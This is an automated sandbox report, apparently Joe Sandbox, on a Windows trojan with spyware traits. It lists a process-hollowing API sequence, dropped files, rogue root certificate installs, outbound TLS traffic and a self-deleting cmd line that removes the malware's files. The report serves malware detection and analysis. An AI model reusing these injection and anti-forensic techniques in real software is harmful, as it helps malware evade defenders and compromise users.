Source: BGDGHJ.2.dr	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
Source: BGDGHJ.2.dr	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
Source: kat2B07.tmp, 00000002.00000003.383481823.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, BGDGHJ.2.dr	String found in binary or memory: https://www.google.com/sorry/indextest

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.22:49161 version: TLS 1.2

Source: Yara match	File source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR

Source: C:\Users\user\Desktop\82xul16VKj.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\82xul16VKj.exe	Code function: 0_2_02EEBEF0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	0_2_02EEBEF0
Source: C:\Users\user\Desktop\82xul16VKj.exe	Code function: 0_2_02EEB250 NtCreateFile,CreateFileMappingA,CreateFileMappingA,MapViewOfFile,CloseHandle,	0_2_02EEB250
Source: C:\Users\user\Desktop\82xul16VKj.exe	Code function: 0_2_02EEB510 NtProtectVirtualMemory,NtProtectVirtualMemory,	0_2_02EEB510

Source: C:\Users\user\Desktop\82xul16VKj.exe	Code function: 0_2_02EEC510	0_2_02EEC510
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D744CF0	2_2_1D744CF0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D761C50	2_2_1D761C50
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D899CC0	2_2_1D899CC0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D73292D	2_2_1D73292D
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7312A8	2_2_1D7312A8
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D732AA9	2_2_1D732AA9
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7E5940	2_2_1D7E5940
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D731C9E	2_2_1D731C9E
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D859A20	2_2_1D859A20
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D732018	2_2_1D732018
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D73D4C0	2_2_1D73D4C0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D899430	2_2_1D899430
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7ED6D0	2_2_1D7ED6D0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7D9690	2_2_1D7D9690
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D749000	2_2_1D749000
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D855040	2_2_1D855040
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D733580	2_2_1D733580
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7C53B0	2_2_1D7C53B0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D90D209	2_2_1D90D209
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D758D2A	2_2_1D758D2A
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D76CE10	2_2_1D76CE10
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D73C800	2_2_1D73C800
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D731EF1	2_2_1D731EF1
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D834A60	2_2_1D834A60
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D870480	2_2_1D870480
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D758763	2_2_1D758763
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D794760	2_2_1D794760
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7C8760	2_2_1D7C8760
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D758680	2_2_1D758680
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7B8120	2_2_1D7B8120
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D858030	2_2_1D858030
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7B0090	2_2_1D7B0090
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D733AB2	2_2_1D733AB2
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D73290A	2_2_1D73290A
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D73251D	2_2_1D73251D
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D767810	2_2_1D767810
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D75BAB0	2_2_1D75BAB0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D73F160	2_2_1D73F160
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D73174E	2_2_1D73174E
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D763370	2_2_1D763370
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7319DD	2_2_1D7319DD
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D90AEBE	2_2_1D90AEBE
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D792EE0	2_2_1D792EE0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D776E80	2_2_1D776E80
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D8169C0	2_2_1D8169C0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D84A900	2_2_1D84A900
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D82A940	2_2_1D82A940
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D73481D	2_2_1D73481D
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D86E800	2_2_1D86E800
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D733E3B	2_2_1D733E3B
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D73AA40	2_2_1D73AA40
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D73EA80	2_2_1D73EA80
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D82A590	2_2_1D82A590
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D75A560	2_2_1D75A560
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7347AF	2_2_1D7347AF
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7466C0	2_2_1D7466C0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D73209F	2_2_1D73209F
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7BA0B0	2_2_1D7BA0B0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\kat2B07.tmp 6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: String function: 1D73395E appears 81 times
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: String function: 1D733AF3 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: String function: 1D731F5A appears 36 times
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: String function: 1D9106B1 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: String function: 1D73415B appears 173 times
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: String function: 1D731C2B appears 47 times

Source: 82xul16VKj.exe, 00000000.00000002.342118140.000000000018D000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResHack! vs 82xul16VKj.exe
Source: 82xul16VKj.exe, 00000000.00000002.342285744.0000000000324000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResHack! vs 82xul16VKj.exe
Source: 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResHack! vs 82xul16VKj.exe

Source: 82xul16VKj.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/14@4/4

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\C7GDP0V0.txt

Jump to behavior

Source: C:\Users\user\Desktop\82xul16VKj.exe

File created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ....................T.A..........4Z.............P..............._B.s.....4Z.......4.t...........0.......................X.................A.....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................W.a.i.t.i.n.g. .f.o.r. .1.0...p........,......................0...............................................	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: .................................... .9.(.P.....................d........-......................e. ........................................s....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: .................................... .8.(.P.............................q/......................e. ........................................s....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: .................................... .7.(.P............................../......................e. ........................................s....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: .................................... .6.(.P..............................0......................e. ........................................s....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: .................................... .5.(.P..............................0......................e. ........................................s....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: .................................... .4.(.P..............................1......................e. ........................................s....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: .................................... .3.(.P..............................2......................e. ........................................s....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: .................................... .2.(.P.....................,.......-3......................e. ........................................s....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: .................................... .1.(.P..............................3......................e. ........................................s....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: .................................... .0.(.P.....................,........3......................e. ........................................s....	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: .................................... .0.(.P..............................5......................e. ........................................s....	Jump to behavior

Source: C:\Users\user\Desktop\82xul16VKj.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\82xul16VKj.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: kat2B07.tmp, kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: kat2B07.tmp, kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: kat2B07.tmp, kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: 82xul16VKj.exe

Virustotal: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\82xul16VKj.exe "C:\Users\user\Desktop\82xul16VKj.exe"
Source: C:\Users\user\Desktop\82xul16VKj.exe	Process created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp C:\Users\user\AppData\Local\Temp\kat2B07.tmp
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2B07.tmp" & rd /s /q "C:\ProgramData\GHDAAKJEGCFC" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\82xul16VKj.exe	Process created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2B07.tmp" & rd /s /q "C:\ProgramData\GHDAAKJEGCFC" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\82xul16VKj.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: sensapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: devrtl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: 82xul16VKj.exe

Static file information: File size 1608192 > 1048576

Source: 82xul16VKj.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x12a000

Source:

Source: sqlt[1].dll.2.dr

Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\82xul16VKj.exe	Code function: 0_2_02EECA10 push edx; ret	0_2_02EECC1F
Source: C:\Users\user\Desktop\82xul16VKj.exe	Code function: 0_2_02EEC310 push edx; ret	0_2_02EEC31B
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D731BF9 push ecx; ret	2_2_1D8D4C03
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7310C8 push ecx; ret	2_2_1D933552

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlt[1].dll			Jump to dropped file
Source: C:\Users\user\Desktop\82xul16VKj.exe	File created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: icon.png

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Users\user\Desktop\82xul16VKj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
